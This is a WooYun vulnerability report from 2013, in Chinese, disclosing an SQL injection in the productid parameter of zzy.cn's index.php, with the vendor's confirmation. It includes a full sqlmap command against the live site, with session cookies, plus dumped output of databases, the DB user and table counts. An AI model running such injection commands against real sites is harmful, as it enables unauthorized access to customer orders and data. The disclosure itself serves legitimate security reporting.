当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035596

漏洞标题:中资源主站SQL注入漏洞一枚(数据库可读写)

相关厂商:zzy.cn

漏洞作者: 雨夜

提交时间:2013-08-29 14:58

修复时间:2013-10-13 14:59

公开时间:2013-10-13 14:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-29: 细节已通知厂商并且等待厂商处理中
2013-08-29: 厂商已经确认,细节仅向厂商公开
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-13: 细节向公众公开

简要描述:

危害也一般般,就是能读读订单,改改产品信息和价钱。
哦,还能改改广告
哦,还能改DNS?

详细说明:

漏洞地址在index.php
对于post参数productid没有过滤导致了SQL注入的产生
能读文件,可以跨库查询,可以获取一些订单的信息,数据库如下

[*] ad
[*] information_schema
[*] sys
[*] test
[*] zzydb


zzydb是当前的库,ad库也可以直接查询修改
web application technology: Apache 2.4.6, PHP 5.5.1
back-end DBMS: MySQL >= 5.0.0
[14:33:10] [INFO] fetching database users
[14:33:10] [INFO] the SQL query used returns 1 entries
[14:33:10] [INFO] resumed: 'zzy'@'localhost'
database management system users [1]:
[*] 'zzy'@'localhost'
直接来个sqlmap的地址吧

sqlmap.py -u "http://www.zzy.cn/index.php?L=domainreg_info" --data "applytime=2&contacter=%e5%a4%a7%e7%88%b7&domainreg_info=%e7%ab%8b%e5%8d%b3%e8%b4%ad%e4%b9%b0&telephoneno=010-88787766&type=0&visitor_id=0&productid=1" -p productid --dbms=mysql --cookie "PHPSESSID=2a66vld8f44q5ihpr7npv2im05; tr_id=1377744881605_8523; tr_lasttime=1377744881610; tr_visitcount=0; tr_lastpage=http://www.zzy.cn/index.php; tr_pagedepth=4; tr_onlinestart=Thu Aug 29 2013 13:18:13 GMT+0800 (中国标准时间); chatOnlyCookies=137774488171135574" -D zzydb --dump --start 1 --stop 10 -T mailprice

漏洞证明:

以上的SQLMAP是猜解zzydb表中mailprice字段1-10条的内容。内容为

mailprice.jpg


还有不少关于交易和订单信息的表,没有全部去看
以下是数据库中各表中的数据数

---
web application technology: Apache 2.4.6, PHP 5.5.1
back-end DBMS: MySQL >= 5.0.0
Database: zzydb
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| userlevel | 66120 |
| visitor | 54570 |
| visitor_productorder | 10126 |
| zzy_areacodeinfo | 3573 |
| jcdm_areacodeinfo | 3537 |
| rolelevelorder | 628 |
| product | 272 |
| role | 238 |
| hostperformance | 60 |
| mailprice | 32 |
| hostproduct | 18 |
| mailtemplate | 11 |
| bandwith | 6 |
| dns | 2 |
+----------------------+---------+


product表中的部分内容,没转码,有乱码

product.jpg


修复方案:

修复吧,需要复查其他url,肯定还有类似参数没有过滤。

版权声明:转载请注明来源 雨夜@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-08-29 15:18

厂商回复:

由于编码人员疏失导致的低级错误,我们目前已立刻展开修复处理。非常感谢白帽子的及时提醒!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-29 14:58 | tzrj ( 实习白帽子 | Rank:87 漏洞数:24 | 1111)

    good

  2. 2013-08-30 00:00 | 大土豆 ( 路人 | Rank:0 漏洞数:1 | 土豆马铃薯洋芋)

    才给10